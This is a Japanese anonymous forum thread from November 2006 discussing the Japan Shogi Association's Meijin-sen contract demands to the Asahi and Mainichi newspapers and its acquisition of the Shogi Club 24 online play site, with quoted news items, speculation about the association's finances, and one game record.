362 :名無し名人:2006/11/10(金) 21:39:43 ID:751vv6wo
>>360
君の言う「アンチ」とは、何に対してかね?
アンチ米長という意味か?

米長はアンチがいるほどの大物ではなかろう。


363 :名無し名人:2006/11/10(金) 21:40:46 ID:wWNCUNw1
>>360
>アンチの人達は結局は単に現状維持派だったって事だよ

現状維持というのはどうなのかねぇ。
単にキチガイを叩きたいだけの常識人が半分。
連盟の行く末を憂慮、もしくは理事会の迷走を疑問視した人間が半分。
こういうところだろう。


364 :名無し名人:2006/11/10(金) 21:43:37 ID:jD4S+cP5
>>354>>359
少なくとも二上や中原が会長の頃よりはいろんな意味で面白い。マシになったかどうかはわからんがw
ていうか、支持するかしないかは棋士が決める事なので、そういった点には興味はない。

>>360
さっそく>>362が釣れたなw

365 :名無し名人:2006/11/10(金) 21:45:38 ID:751vv6wo
ん???
ID:cUuqjOXe=ID:wWNCUNw1なのかい?


366 :名無し名人:2006/11/10(金) 21:46:17 ID:6iZabU0V
名人戦問題は、棋界改革の単なる起爆剤なんだよ
棋士にとっても新聞社にとってもファンにとっても
ある意味平等に重要な問題となる。

3者の利害が一致している以上、かならず決まった場所に落ち着く
交渉自体に問題があったにしろ、全てが将棋に関わる者達の責任だ。


367 :名無し名人:2006/11/10(金) 21:50:22 ID:cUuqjOXe
>>366
新聞社はともかく、ファンのベクトル、棋士のベクトルはバラバラだからねぇ。
厳密な意味でこれらの利害が一致することは無いと思う。

368 :名無し名人:2006/11/10(金) 21:50:49 ID:751vv6wo
>>366
で、改革の最大目的は何だい?
スポンサーとゴミ棋士の整理整頓かね?

369 :名無し名人:2006/11/10(金) 21:51:14 ID:uXvjA6Tw
>結局癌だったのは、古臭い棋士とか古臭い将棋ヲタだったって事なんだよ

米長に逆らう者は癌だって、お前はどれだけ単細胞なんだよw
だから将棋脳とか揶揄されるのに。

370 :名無し名人:2006/11/10(金) 21:55:37 ID:mFa0hdVI
今日の発表は24買収とYahooの件だったのね

で、17日に名人戦契約締結(連盟だけ予定)か?

371 :名無し名人:2006/11/10(金) 21:56:15 ID:6iZabU0V
>>367
いや、かならず一致するよ
名人戦が最高の棋戦である限り。

>>368
そんな感じで、色々な論争が出きる事だろね
とりあえず色々なとこにメス入れて解剖かな。

>>369
会長を批判するのはいいんだよ
何なら、米長以上の会長が出てきてくれればもっといい。

372 :名無し名人:2006/11/10(金) 21:59:05 ID:mFa0hdVI
>>365
ただ、去年から棋士側でも「棋戦改革委員会」ができて
定期的に会合開いて改革案集約中だけどね。

そのうち実現性が高いといわれているのが
「棋戦別フリクラ制度(仮称)」
ようするにある棋戦で2,3年連続して初戦敗退とか
しょーもない成績だと

・その棋戦に限り1期休場(不参加)
・その棋戦に限りオープン参加(参加料ペイして参加)

などがあがっている。

これは各新聞社からリストラ要望が高いために検討しているそうだ。


373 :名無し名人:2006/11/10(金) 22:01:31 ID:ahigClok
今の将棋連盟がやってるのは、改革などではなくて
昔中日の落合が現役の頃、契約金引き上げを目指して
球団と延々ともめ続けてたのと同レベルだ。


374 :名無し名人:2006/11/10(金) 22:01:49 ID:751vv6wo
うむ
シード権を厳しく適用することは、ひとつの手だね。


375 :名無し名人:2006/11/10(金) 22:02:21 ID:xGSyQh7f
永世シードはなくすべきだなあ

376 :名無し名人:2006/11/10(金) 22:03:38 ID:mFa0hdVI
>>372
ただクマースレの連中は断固反対のようだがw

377 :名無し名人:2006/11/10(金) 22:07:21 ID:cUuqjOXe
>>371
朝日が名人戦に5億以上の金を(当初)提示したのは、それだけの価値があるからと
踏んでのこと。ここからは想像の域を出ないが、朝日は将来的にコンピュータを一棋士と同じく順位戦に参加させ
名人に何処まで迫れるか……を目玉にするつもりではないか。
例えは悪いが、今現在の名人戦七番勝負は、それほどのニュースバリューを生んでいるとはいえない。
ところがこれが名人とコンピュータの七番勝負になれば、盛り上がりは相当なものになるだろう。

そう遠くない将来にこういうことが起こりうる……朝日にはそういう読みがあるのでは。
これは連盟(棋士)にとっては痛し痒しの展開。盛り上がるのは結構だが、名人がコンピュータに敗れたあとはどうなるか……。

378 :名無し名人:2006/11/10(金) 22:08:53 ID:uXvjA6Tw
>>371
>>354
>アンチは、それでも米長を理事会を支持しないのか?
>結局癌だったのは、古臭い棋士とか古臭い将棋ヲタだったって事なんだよ
>将棋が陰気臭くなったのも、キモヲタ連中が牛耳ってたからなんだよ。
>未だに卑劣な批判してる人達こそ、時代遅れの可愛そうな人達なのかもしれないね。

こうやって都合の悪い事は全部キモヲタのせいにできる米長支持者って最高だよ。

379 :名無し名人:2006/11/10(金) 22:10:43 ID:cUuqjOXe
>>372
一次予選一回戦の敗者には鐚一文やらない……というだけで
結構な経費削減になると思うのだが。

380 :名無し名人:2006/11/10(金) 22:16:50 ID:6iZabU0V
>>377
もっと単純だよ、歴史があるってのもそうだけど
棋士にとっては生活がかかってる→真剣に指す→面白い将棋
→ファンが見る→新聞社も金出す。

>>378
むしろ自己批判だよ、正直棋界の問題なんて興味無かったし
今更騒いでる連中は、一体今まで何をやってたのか疑問で仕方ない
もっと前に先頭に立って改革しといてくれよと。

381 :名無し名人:2006/11/10(金) 22:22:34 ID:cUuqjOXe
>>380
コンピュータに勝てなくなった棋士に、新聞社はお金出さないと思うよ。
これは今現在の認識といっても良いと思う。
そういった意味で、トッププロと弱小プロの間で認識、考えが一致することはないんじゃないかと。

382 :名無し名人:2006/11/10(金) 22:28:03 ID:751vv6wo
>>380
仮に、どんな人間でも絶対に敵わないコンピュータ・ソフトが出現したら
プロ将棋の市場が大混乱をきたして相場が激変するだろうね。



383 :名無し名人:2006/11/10(金) 22:28:43 ID:6iZabU0V
まあ、アレだ。
竜王の言葉を少し借りると
「衰退した将棋界と堕落した棋士達の将棋見せ
われわれ後輩には残飯を食べさせる気ですか」
って事だな。

古臭い連中同士で、揉めてる場合じゃないだろ。

384 :名無し名人:2006/11/10(金) 22:54:26 ID:ZtNFWW4+
★将棋連盟、国内最大の対局サイト事業を譲り受け

 日本将棋連盟は10日、国内最大のインターネット将棋対局サイトを運営する
ネットベンチャー企業「将棋倶楽部24」(神奈川県海老名市、久米宏社長)から
ネット対局事業の譲渡を受けることで同社と合意したと発表した。

 同社が運営してきた対局サイト「将棋倶楽部24」の登録会員は現在、20万人
を超える。今月17日にも譲渡を受け、将棋連盟はネット対局事業に進出する。
譲渡後も、匿名での登録と利用料無料は維持する。

 囲碁の日本棋院はすでにネット対局サイトを運営しているが、将棋連盟は
ネット事業の取り組みが遅れていた。10日会見した米長邦雄連盟会長は
「ネットを通じた将棋の普及に弾みをつけたい」と期待を語った。

http://www.nikkei.co.jp/news/main/20061110AT1G1003110112006.html

385 :名無し名人:2006/11/10(金) 23:08:58 ID:751vv6wo
ほぉ。24を買い取ったのか。
久米はいくらで売ったんだろうね。

386 :名無し名人:2006/11/10(金) 23:28:11 ID:Pcul0Aa5
なんでもいいから連盟の文句付ければいいと思ってる奴がいるな。
ヤフオクに出せばイチャモンつけて、24買い取ったらまた文句つける。
代案聞いても答えないし
アンチ連盟には病気染みたキチガイがいるってことは分かった

387 :名無し名人:2006/11/10(金) 23:30:36 ID:nx2PUuOE
>>384
>将棋連盟はネット事業の取り組みが遅れていた。

泣けるねえ。
日本将棋ネットワーク株式会社(略称「NSN」)が10年前に設立されているのに。


日本将棋ネットワーク〜日本将棋連盟唯一の将棋対局公式サイト〜
http://www.nsn.co.jp/

NSNのうたい文句が泣いている。NSNはいつこのフレーズを取り下げるんだろう・・・。

388 :名無し名人:2006/11/10(金) 23:51:02 ID:Pcul0Aa5
米長か誰かがネット棋戦作るみたいなこと言ってたよね?
24買い取ったのはそのための土台作りと考えて良さそうだね

389 :名無し名人:2006/11/10(金) 23:59:38 ID:fT2PznbH
優勝賞金が100万円でも
名人位だけは価値があると思う・・・

凱旋門賞>>>>∞>>>>ドバイワールドカップ

結局、将棋連盟は会社だったんだね。

萎え。

390 :名無し名人:2006/11/11(土) 00:03:21 ID:SDpr+FQr
ttp://www.sanspo.com/sokuho/1110sokuho044.html

将棋連盟、毎日と朝日に6億6000万円提示 名人戦共催
 日本将棋連盟の中原誠副会長は10日、毎日新聞社と朝
日新聞社が共催で合意した名人戦について、両社に契約金
など総額で年6億6000万円を提示していることを明らかにした。

 連盟が10月20日に提示した条件は契約金各2億円、振興金
各3000万円、普及協力金各1億円。同副会長は「今月中旬をめどにできるだけ早く返事がほしい」と早急な回答を求めた。これに対し、毎日は「年内をめどに話し合っていく」、朝日は「正式な交渉は始まっ
たばかり。毎日新聞社とともに誠意を持って交渉に当たりたい」とコメ
ントした。

 毎日主催の王将戦に7800万円以上、朝日主催の朝日オープン
選手権に8000万円以上の契約金を提示していることも明らかに
なった。


391 :名無し名人:2006/11/11(土) 00:34:42 ID:HFJ4juYl
「協議が不調の場合は、朝日単独主催案に戻さざるを得ない」としている。

一見、毎日いじめのようにみえるけど、
じつは朝日に「協議をこっちの言い値でまとめないと、おまえ一社に背負わすぞ、ゴルァ」
といっているようにも見える。

392 :名無し名人:2006/11/11(土) 00:44:27 ID:DeogZJtX
今度は朝日を恫喝か。やれやれ・・・

393 :名無し名人:2006/11/11(土) 00:58:29 ID:gvg4LDaa
恫喝じゃないでしょ。米長はそのつもりかもしれないが朝日は痛くも痒くもないw
うちはもうそんな金は出せません、と断わるだけのこと。

現実には朝日・毎日が大人の対応をして共催でまとまるだろうけどね。

394 :名無し名人:2006/11/11(土) 01:02:02 ID:DeogZJtX
>>393
米長がそのつもりなら恫喝だろう・・・
朝日がどう取るかは関係ない。

395 :名無し名人:2006/11/11(土) 02:50:03 ID:K/cfaDeu
やっぱこれは一義的には毎日に対する恫喝でしょう。
そもそも朝日が普及協力金なんてことを言い出すから、※がその気になった。
その収拾のため朝日は毎日を盾として利用している、ってとこか。
朝毎ががっちりスクラム組んで共催、契約金各社2億円、その他寄付金無し、
でつっぱたら※はどうするつもりなんだろう。
大いに有り得る状況だとは思うけど。

396 :名無し名人:2006/11/11(土) 02:54:54 ID:K/cfaDeu
そういや升田が最後まで「米長に連盟の財布を握らせたら駄目だ。」と言って
※が理事になるのを反対してたんだよな。
普及協力金なんて所詮※のポケットマネーとなるだけでしょ。
読売が払わない寄付を朝毎が払うという構図は本来的には有り得んでしょ。

397 :名無し名人:2006/11/11(土) 03:37:51 ID:AYBDS9Qy
普及協力金はいるつもりで24買ったんだねw

398 :名無し名人:2006/11/11(土) 03:47:45 ID:ceGoPYhK
将棋連盟、名人戦、年額6億6000万円を朝日・毎日に提示
http://news18.2ch.net/test/read.cgi/mnewsplus/1163182692/

米長の1本勝ちかよかよ。
新聞社にまともな感覚があるなら名人戦を
朝日・毎日とも放棄しろ。

399 :名無し名人:2006/11/11(土) 04:12:37 ID:K/cfaDeu
>>397
モロそんな感じだね。
そんでもって、きっとそれ以外にも普及協力金を充て込んで
使った金あるような悪寒

400 :名無し名人:2006/11/11(土) 04:15:16 ID:w2+U5vzA
これって
3億3400万円→6億6000万円にしろってこと?

401 :名無し名人:2006/11/11(土) 04:41:05 ID:0Lsd+4Nj
>>398
どこが※の勝ちに読めるんだ?w
連盟が今月中に返事くれといっているのに、毎日は年内にと言っている。
例によってまともな根回ししていない証拠w
両者共この提示にはけっこうムッときてると思うよ。
連盟、朝日、毎日の三者協議をするべきところを一方的な通達だもんね。
何様だと思っているのか。

402 :名無し名人:2006/11/11(土) 04:52:46 ID:K/cfaDeu
>>401 その通り
共催が決まってから、毎日と連盟の力関係は明らかに逆転したね。
そこでなんとか挽回しようとして共催が紛糾したら朝日単独に戻すなどと、
また寝言を言ってる。
朝日に戻どしても普及協力金は戻りませんから。
※ジョンイルは本当に北朝鮮脳だね。


403 :名無し名人:2006/11/11(土) 04:52:58 ID:myfBlSU3
>>400
そういうこと。しかも名人戦だけでなく、

毎日は王将戦を年7800万以上の契約金を払え、
朝日は朝日オープンに代わる新棋戦を創設し年8000万程度の契約金を払え、

という条件付き。
トータルで 両社に対し 年8億1800万円 を要求している。


将棋連盟すげーよ。幼稚園がアレ買って!コレも欲しい!全部ボクのモノ!と
ワガママ言ってるみたいだわw

404 :名無し名人:2006/11/11(土) 04:58:55 ID:K/cfaDeu
なんかこのゴタゴタの顛末の方が竜王戦より面白い、
というのはやっぱ問題だよな

405 :名無し名人:2006/11/11(土) 06:00:12 ID:7CAOs0c0
落としどころは、毎日と朝日が名人戦に6億払うけど
王将戦と朝日オープンは廃止くらいが世の中の常識。

将棋脳はすごいな。

406 :名無し名人:2006/11/11(土) 06:04:20 ID:yXka2kpC
相変わらず非礼な連盟だな。
将棋は礼に始まり〜なんていうけど
形式的に頭下げてるだけなんだろうな。
所詮棋士など将棋が強いだけのアホの集まり。

407 :名無し名人:2006/11/11(土) 06:32:06 ID:ceGoPYhK
>>403
朝日を使って一儲けをたくらんだ将棋連盟ってところか。
朝日は名人戦がほしいものだから飛びついた。
単独でやりたかったが世論が許してくれるようでないから共催に。

そしたらふっかけふっかけの将棋連盟。
すべては新聞社がバカだからやりたい放題の将棋連盟。
わっはっはっは。

米長の奇襲大成功 !!

408 :名無し名人:2006/11/11(土) 06:34:40 ID:yXka2kpC
おめでたい奴だな。

409 :名無し名人:2006/11/11(土) 07:02:29 ID:6Fwh88wa
数人しかいない常連客を大事にするんじゃなくて、
逆にしゃぶりつくそうとしてる連盟の態度はいかがなものか。


410 :名無し名人:2006/11/11(土) 07:12:51 ID:KWul7PWk
朝日がもし単独案で交渉する気がないなら、共催案交渉の段階で
その姿勢を示していると思うんだが。
共催額値下げの材料になるんだから。
もしこの発表があれば、連盟は共催案を考え直さざる得ない。
逆に無い内は連盟もある程度自分たちの希望額を押せる状況にある。

単独交渉権利は朝日が毎日と比べはっきりとリードしている部分
なので、これを放棄するとは思えないけどね。
とりあえず毎日と歩調を合わせて共催案の値下げ交渉に当たって、
単独案とどちらが得かを見極めてる段階だろう。

411 :名無し名人:2006/11/11(土) 07:20:29 ID:PU0JKbwI
金吹っかける前に無能底辺ゴミ棋士をさっさとリストラしろ

412 :名無し名人:2006/11/11(土) 07:31:05 ID:ceGoPYhK
>>411
そこは将棋連盟社会主義が貫かれている。
中国でさえ経済においては市場経済である。
どちらかといえば将棋連盟は北朝鮮と同じ体制
といえる。

まあ新聞社も社会主義を是認している論調が
あるのだから、ばーんとスポンサーになって
金を恵んであげるのも言動一致でいいのかな
とも思う。

413 :名無し名人:2006/11/11(土) 08:43:43 ID:lnnSai0N
【全タイトル保持者自筆署名入り】榧七寸盤&掬水作盛上駒セット
現在の価格: 1,700,000 円
ttp://page3.auctions.yahoo.co.jp/jp/auction/c126054144

誰か入札してやれよW

414 :名無し名人:2006/11/11(土) 08:45:25 ID:gzw0QjV3
>>412
正に連盟は北朝鮮。そこに君臨するのは※正日。

なぜに連盟は朝毎を催促してまで急いで契約を締結したいのか?
それは、普及協力金を先に貰いたいから、というか既に普及協力金が
入ってる前提でいろいろなことに金を使うことになったから。
24の買収なんかもそのひとつかもね。
でも、交渉ごとは焦った方が負けなんだけどね。

415 :名無し名人:2006/11/11(土) 08:48:54 ID:gzw0QjV3
>>413
「最高額入札者:なし」だって、藁た
※って男は山梨の田舎の貧しい家庭に育ったせいか、とことん欲深よのぉ〜

416 :名無し名人:2006/11/11(土) 09:04:05 ID:DeogZJtX
そのとおりだ>>414
交渉事は焦ったら負ける。というか不利を自覚しているから焦る。
そして墓穴を掘る。どんな世界でもそうだね。

寅の狸の皮算用。

417 :名無し名人:2006/11/11(土) 09:08:40 ID:2YVlf6Dp
上限:6億6千万
下限:現在の名人戦契約金(約半分)

最終的には五億前後で歩み寄る?
王将は廃止、朝日はしょぼい臨時棋戦を五年やる。              

418 :名無し名人:2006/11/11(土) 09:56:12 ID:QvUduPas
棋戦価値のよくわからない朝日オープンなんかやめてその分+αを名人戦の対局料に上乗せすればOK

419 :名無し名人:2006/11/11(土) 09:57:21 ID:HL0CgO9K
予告されてる「世界」次号の名人戦特集は何やるんだ? できるのか?

編集部の人には同情する。ページ割りが決まらないよね。

420 :名無し名人:2006/11/11(土) 09:59:13 ID:jx8QHw2i
朝日・毎日両社に対し  名人戦契約金 年 各2億円
これで竜王戦は序列1位の提案は、
3大紙もおこるだろうなあ
馬鹿にするな

421 :名無し名人:2006/11/11(土) 10:08:38 ID:CcZSov0t
今までは、小毎日が名人戦を契約、余裕の大読売が少し上乗せして契約、
って形で問題がなかったんだけどねえ。
共催となった場合の競り合いの対象は、朝日毎日vs読売、って形になる。
5億で名人戦を契約して、読売が2位なら大幅減額とか言われたら大変だ。
先に読売と交渉して、竜王戦が1位か2位かいくらなのか、
が決まらないと名人戦の条件は交渉のしようがないと思う。

422 :名無し名人:2006/11/11(土) 10:21:58 ID:WSD/eyv6

将棋連盟が毎日、朝日に6億6000万円を提示…名人戦共催で
http://hochi.yomiuri.co.jp/topics/news/20061110-OHT1T00196.htm

日本将棋連盟の中原誠副会長は10日、毎日新聞社と朝日新聞社が共催で合意した名人戦について、
両社に契約金など総額で年6億6000万円を提示していることを明らかにした。

連盟が10月20日に提示した条件は契約金各2億円、振興金各3000万円、普及協力金各1億円。
同副会長は「今月中旬をめどにできるだけ早く返事がほしい」と早急な回答を求めた。
これに対し、毎日は「年内をめどに話し合っていく」、朝日は「正式な交渉は始まったばかり。
毎日新聞社とともに誠意を持って交渉に当たりたい」とコメントした。

毎日主催の王将戦に7800万円以上、朝日主催の朝日オープン選手権に8000万円以上の契約金を提示していることも明らかになった。

(2006年11月10日20時30分 スポーツ報知)


゚( ゚^∀^゚)゚。アーッハハハハノヽノヽノヽノ\ / \

423 :名無し名人:2006/11/11(土) 10:37:20 ID:HKqWo6Gl
今回、振興金3千万や普及協力金1億が各々追加になったけど、
他の新聞社とかも同じようなもの払ってたの?
契約金だけかと思ってたんだけど。

424 :名無し名人:2006/11/11(土) 10:48:41 ID:jx8QHw2i
>>421
大毎日新聞様は、30年間将棋界1番のスポンサー様だよ



425 :名無し名人:2006/11/11(土) 10:53:43 ID:FhG+m/mL
結局、問題の発端だった退職金問題は嘘だったの?

426 :名無し名人:2006/11/11(土) 12:03:12 ID:0HUCagN1
24とNSNを合併させて、過去の負債をうやむやにするつもりだな。
その為の金を普及協力金名目で新聞社からたかろうとしてるってわけか。
どさくさに紛れて※のふところにも金が落ちる仕組みかな。

427 :名無し名人:2006/11/11(土) 12:24:30 ID:MQxjrszu
元名人は往年の勢い無く、若手に馬鹿にされながら将棋を指しています。

428 :名無し名人:2006/11/11(土) 12:42:51 ID:QvUduPas
元名人…

429 :名無し名人:2006/11/11(土) 12:43:36 ID:ViZabYTF
>>426
>24とNSNを合併させて、過去の負債をうやむやにするつもり

なるほど、24の買収はそれが一番の目的か!

うまいこと考えたものだな。それで買収額は公表しません。
公表するとうやむやに出来ないだろうからな。

430 :名無し名人:2006/11/11(土) 12:53:30 ID:CcZSov0t
公式には無関係だが、怪しいとされていたNSNの赤字。
協力金をNSNの穴埋めに使うとしても、名目がないじゃんと言われていた。
が、協力金で買ったNSNの管理をNSNに任せる、形にすれば解決だ。
すっきりはせんが、2万人の対応能力がありながら実際は遊んでいるNSNの設備を
24が使えるようになるのは将棋界全体としてはプラスかね。

NSN問題まとめページ
ttp://game9.2ch.net/test/read.cgi/bgame/1147976161/

431 :名無し名人:2006/11/11(土) 12:58:28 ID:LyXLSYWj
>>429
公表しませんつっても、社団法人の決算書みたいなのには出てこないの?
他の項目と一緒になってしまって判別できない?

432 :名無し名人:2006/11/11(土) 13:09:05 ID:JHKDznPI
>>426
NSNは実質アルゼの持ち物になってるから、合併は不可だろ。

433 :名無し名人:2006/11/11(土) 13:11:42 ID:HL0CgO9K
「NSNの穴埋め」っていっても具体的はどうすんの?
合弁会社なんでしょ?

434 :名無し名人:2006/11/11(土) 14:20:15 ID:yXka2kpC
名人戦問題を総括なんて将棋世界誌でまだできねえだろ。
この分だとまだまだこの問題長引くな。

435 :名無し名人:2006/11/11(土) 14:30:06 ID:DeogZJtX
米長氏はボケてしまっておられるのかもしれない。したがって

米長元名人・・・×
元米長名人・・・○


436 :名無し名人:2006/11/11(土) 14:38:44 ID:tsRWTzfW
>>433
どさくさまぎれに、NSNの失敗の責任を久米に押し付けて・・ガクガク

437 :名無し名人:2006/11/11(土) 16:16:26 ID:vkMGEOU9
朝日は共催を潰したほうが有利ってこと?

438 :名無し名人:2006/11/11(土) 19:24:51 ID:yXka2kpC
>425、正解。

439 :名無し名人:2006/11/11(土) 19:34:21 ID:KWul7PWk
朝日は4億900万払って共催するよりは、5億4500万払って単独案
の方が得だと思ってるはずだよ。
単独開催すれば将棋好きの間で毎日→朝日へ購読新聞移行の
可能性もあるし、名人ブランドを独占して毎日とコンテンツクオリティに
差を付けられる。
もし共催案が臨時棋戦料込みで3億切るぐらいになれば、朝日も
共催一本に絞って交渉を行う可能性がある。

440 :名無し名人:2006/11/11(土) 20:07:34 ID:HL0CgO9K
共催案は総会投票結果が僅差がゆえのものだったわけでしょう?
その後、毎日の受け入れに対し、全タイトルホルダーがそれぞれ感謝を述べたりもして。

交渉は理事会一任なんだろうけど、共催案が成り立つ方向で進めないと、
筋が通らない話になってしまわない? ふっかけもいいけど・・・
新聞側にも、のらりくらりがあるようにも見えるし・・・

信用し合ってない風にも見えて、それはやっぱり連盟に非があるんだろうな。
こんなこと、何カ月もやるようなことじゃないと思うけどね。

441 :名無し名人:2006/11/11(土) 20:12:53 ID:vkMGEOU9
毎日と朝日キレてが王将戦、オープンと共に撤退するのが
見てて一番面白いシナリオ

442 :名無し名人:2006/11/11(土) 20:25:20 ID:zW1saUBJ
まあ野次馬的には二社連合に切れて欲しいわな。

交渉決裂で朝日は「加藤一二三回想録」で将棋欄を埋めて、
毎日は「大山康晴熱闘譜」を羽生・森内・勝又(wの解説で連載するという展開をきぼんぬ。

新聞観戦記の読者は高齢者が多いからそっちの方が読者受けがいいような気がするし(w。

443 :名無し名人:2006/11/11(土) 20:28:37 ID:zW1saUBJ
あ、朝日は東公平の「升田幸三物語」という手もあるか。


444 :名無し名人:2006/11/11(土) 20:40:52 ID:KWul7PWk
>>440
交渉事だから、どっちに非があるないの話しじゃないと思うけどね。
仮に連盟が折れて共催額5億円にしたら話しはすんなりまとまる
だろうけど、だからって米長が有能ってことにはならないでしょ?

共催案もハナから結ぶ気は全くなくてふっかけたって訳じゃないと思う
(そんなことしたって連盟にはなんの得にもならないしね)。
共催案を折半ではなく少し毎日有利な条件にしてるし、毎日への
配慮も感じ取れる。
それでも多少高いけど、この金額は下がることはあっても上がることは
ないので、少し高めの提示なんだと思う。

445 :名無し名人:2006/11/11(土) 21:01:20 ID:uALEIhdl
漏れは朝毎連合は契約金各2億円、名人戦振興金と普及協力金はナシ、
朝日オープンは廃止、それに代わる棋戦もなし、王将戦は同じ契約金で存続、
という案を連盟にぶつけると思う。
その後、もし朝日が毎日との共催にこだわれば連盟には対抗カードが無く、
名人戦が空中分解か連合の言い分を呑む。その際、それぞれ2,500万円位の
上乗せはあるかもしれない。
どうよ

446 :名無し名人:2006/11/11(土) 21:21:02 ID:PKekehPP
両新聞社の共催合意内容に、王将戦と朝日オープンは個別に
協議とあるにもかかわらず、名人戦の共催条件と同時に発表し
たというのは、共催拒否と受け取られても仕方がない。

両社の将棋担当者は、幹部から
「将棋連盟はいったいどういう組織なんだ?」
と詰問されて苦労していると思う。

447 :名無し名人:2006/11/11(土) 21:35:40 ID:uALEIhdl
>>446
それに両社の幹部から、大読売が払ってないのにどうして俺達だけ
振興金やら普及協力金を払わなければいけないんだ、って問い詰め
られたら担当者はごもっともです、って言わなきゃいけないだろうね。

448 :名無し名人:2006/11/11(土) 21:36:07 ID:ceGoPYhK
>>441
別にそうしても問題はないはず。
ようは契約内容しだいではないのかな。
契約を正式にむすべば新聞社だから履行する
だろうけど結んでいない段階ではどうにでも
変更はできるのでは。
王将戦、オープンで将棋連盟が新たな条件を
つけてきたのだから契約の撤回も可能なはず。
ついでに名人戦も話がまとまらず撤回になって
将棋連盟が3つの棋戦のスポンサーを探すという
流れが1番おもしろい。

449 :名無し名人:2006/11/11(土) 21:38:18 ID:E/nrh66t
           |
       \  __  /
       _ (m) _ピコーン
          |ミ|
        /  `´  \
         ∧ ∧
        (・∀ ・)  このスレみてる朝日の記者さん!
        ノ(  )ヽ   売り上げ倍増の奇策を思いついたよ!
         <  >



       \     /
       _ `゙`・;`' _バチュ--ン
          `゙`・;`
        /  `´  \
         ∧ ∧
        (・∀ ・)
        ノ(  )ヽ
         <  >



         ∧ ∧
        (・∀ ・) <何だっけ
        ノ(  )ヽ
         <  >

450 :440:2006/11/11(土) 22:08:40 ID:HL0CgO9K
>449
> 交渉事だから、どっちに非があるないの話しじゃないと思うけどね。
そうですね。勉強になりました。

毎日の足下をついての一連という印象は拭いきれないんですよ。
毎日は将棋を切れなかったわけで、そのへん米長には状況がよく見えてるようで、
すごいと思うんだけど、そろそろ落としどころを見つけて欲しい。

451 :名無し名人:2006/11/11(土) 22:27:51 ID:wNh0oxHr
>米長には状況がよく見えてるようで

それはないw
上のほうでも指摘されていたが、リアルの事態の推移と米長・寅・西村らの
発言・発表はものすごくズレまくっている。
連盟側の言い分だけを見ても、発端から現在までの動きには一貫性がなく
迷走としか言いようがない。
金が欲しいという一点だけは一貫しているがw

そもそも連盟はなぜ金が欲しいのか?退職金が足りないからだ、という
当初掲げた名分さえどこかに消えてしまったねえ。

452 :名無し名人:2006/11/11(土) 23:05:03 ID:HUM6sm/o
先手:谷川浩司
後手:郷田真隆

▲2六歩 △8四歩 ▲2五歩 △8五歩 ▲7八金 △3二金
▲2四歩 △同 歩 ▲同 飛 △2三歩 ▲2八飛 △8六歩
▲同 歩 △同 飛 ▲8七歩 △8四飛 ▲3八銀 △3四歩
▲2七銀 △4一玉 ▲3六銀 △3三角 ▲6九玉 △2二銀
▲7六歩 △6二銀 ▲1六歩 △1四歩 ▲5八金 △5二金
▲6六角 △同 角 ▲同 歩 △3三桂 ▲8八銀 △5四歩
▲7七銀 △5三銀 ▲7九玉 △4四歩 ▲4六歩 △8二飛
▲1七桂 △1五歩 ▲同 歩 △同 香 ▲2四歩 △同 歩
▲同 飛 △4九角 ▲4八金 △1六角成 ▲2五桂 △同 馬
▲同 銀 △2三銀 ▲同 飛成 △同 金 ▲2四歩 △2二金
▲3四銀 △2九飛 ▲8八玉 △8六歩 ▲同 銀 △7四桂
▲5六角 △5九飛成 ▲5八金 △1九龍 ▲2三歩成 △8六桂
▲同 歩 △8七歩 ▲同 金 △6九龍 ▲1四角 △2五銀
▲同 銀 △5八龍 ▲7八銀 △2五桂 ▲2二と △5一玉
▲2五角 △5七龍 ▲6七金 △5九龍 ▲6八銀 △4九龍
▲6五桂 △8五歩 ▲3四角左 △6二金打 ▲5三桂成 △同 金右
▲7一銀 △8六歩 ▲8二銀成 △8七歩成 ▲同 銀 △8六歩
▲5二角成 △同 金 ▲4二金
まで105手にて先手の勝ち


453 :名無し名人:2006/11/11(土) 23:41:38 ID:KWul7PWk
>>450
俺も個人的には共催案で決めて欲しい。
朝日単独案で毎日と連盟、双方がリスクを負う必要はないと思うし。
毎日が簡単に名人戦を切れないのは、名人戦コンテンツを作ったり、
販促方法を確立した、毎日自身の努力の裏返しでもあるからね。
かと言ってあまり共催額を下げすぎると、今度は朝日が単独案を
捨てて共催交渉に本腰を入れてしまう。
今の額の−1億ぐらいまでで決まるかどうか、連盟にとってはギリギリの
交渉を続けてるんだと思う。

これだけ新聞社にプレッシャーをかけられると折れてしまいそうだけど、そうならないだけでも連盟は凄いと思う。

454 :名無し名人:2006/11/12(日) 00:39:51 ID:0IrQNccd
用途不明なのに「ぎりぎりの交渉」といわれてもねぇ・・・

455 :名無し名人:2006/11/12(日) 07:19:18 ID:pkkZdBE+
囲碁の故加藤正夫先生と比較するだけで米長のしょぼさ危うさは一目瞭然。
新聞社の人々には当然それが見えている。
米長だけが将棋界ではないから朝日毎日は基本的には大人の対応をする筈だが、
あまり暴走すると、連盟という組織自体が叩かれるかも知れない。

>>893
激しく空咳、三回空打ちした後同銀不成

456 :名無し名人:2006/11/12(日) 08:08:42 ID:Z12nDxbo
>>455
その米長を担ぎ上げて(形だけでも)いるのが、現在の将棋界なわけでね。
自分たちのケジメで、今の体制をなんとかしないと。もう手遅れかもしれないが。。


457 :名無し名人:2006/11/12(日) 08:14:16 ID:MD/DvTWY
秀行を理事長にしちゃったようなものか?

458 :名無し名人:2006/11/12(日) 09:10:05 ID:ZkSdSL+J
http://d.hatena.ne.jp/mozuyama/20060412/P20060412MEIJIN
http://hobby.nikkei.co.jp/shogi/news/index.cfm?i=20060529s1000s1
http://www.iza.ne.jp/news/newsarticle/leisure/igo-shyogi/7916/
http://d.hatena.ne.jp/mozuyama/20061109/P20061109MEIJIN

世の中すべて金しだい。


459 :名無し名人:2006/11/12(日) 09:29:22 ID:MD/DvTWY
東京将棋記者会の内容、
まだ?

460 :名無し名人:2006/11/12(日) 12:43:41 ID:u8xDUFEt
http://hobby.nikkei.co.jp/shogi/news/index.cfm?i=20061109s1000s1

461 :名無し名人:2006/11/12(日) 14:34:26 ID:1rU0OdOo
だから、名人戦は主要スポンサー全部が金出すシステムにして
完全に別格にしちまえって、棋譜データベースも公開して
全棋戦ネット中継やその他将棋関連盛り沢山のサイトを有料化
もちろん子供でも入れる安い料金で。

462 :名無し名人:2006/11/12(日) 21:08:21 ID:sYdCSViK
>>457
マジレスするが、天然の無頼派と無頼を気取る者とでは、人間のスケールが違いすぎる。
自然にまわりに人が集まってくる人間と、権力欲から対人関係を作る人間の違いとも言える。

それにだいたい、日本棋院の免状が高いからと、出せば出すほど自分が損をする免状を出した秀行先生と
棋士の為の金集めに汲々とする現将棋連盟会長では、向いている方向が全く違う。
